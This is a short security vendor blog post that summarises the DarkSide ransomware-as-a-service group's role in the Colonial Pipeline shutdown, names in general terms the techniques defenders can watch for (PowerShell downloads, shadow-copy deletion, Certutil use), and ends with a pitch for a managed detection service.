March 01, 2022
Dealing with DarkSide
Brian Krebs reviewed more details about ‘DarkSide’ and this ransomware group’s role in shutting down the Colonial Pipeline. DarkSide is a group that packages and provides ransomware capabilities as a service. Other ransomware gangs and organisations pay a fee for DarkSide tools and services making it difficult to provide accurate attribution.
This group packages and modifies common backdoors like Harpy, Sekur, and Cobalt Strike with their own custom loaders and management interfaces. They configure and deploy various ransomware packages like REvil ransomware, none of which are actually unique to DarkSide. It’s not the malware they sell or the particular techniques used that make them effective, it’s the fact that they are well organised and experienced. This group has an entire intelligence arm and streamlined operating procedures that start with researching their victims, ensuring they are vulnerable, blind, and capable of paying ransoms.
How to deal with DarkSide:
So, what can you do about this potential threat? It might seem simple, but prioritising security infrastructure and monitoring will be the keys. DarkSide has benign recon and intel gathering stages that can safely determine the capabilities of their victims. This group tends to avoid well defended organisations and victims with capabilities to find them—like behavioral detection and response capabilities. CISA also has provided these recommendations for preventing business disruption from ransomware attacks.
Techniques to look out for:
- DarkSide uses Powershell to download the first malware stages and prep systems.
- They delete Volume Shadow Copies via Powershell.
- They decode and execute malware via Certutil.exe.
- They can perform privilege escalation on older operating systems like Windows 7 (none seen for most modern OS’s yet)
Once recon is performed, they spread fully through the network and begin PR campaigns prior to execution of the encryption/ransom. This is an opportunity window for detection and mitigation if you have an active MDR service watching for these.
To learn how to protect your clients’ from the most sophisticated and malicious cyber threats, set up a demo with one of our representatives.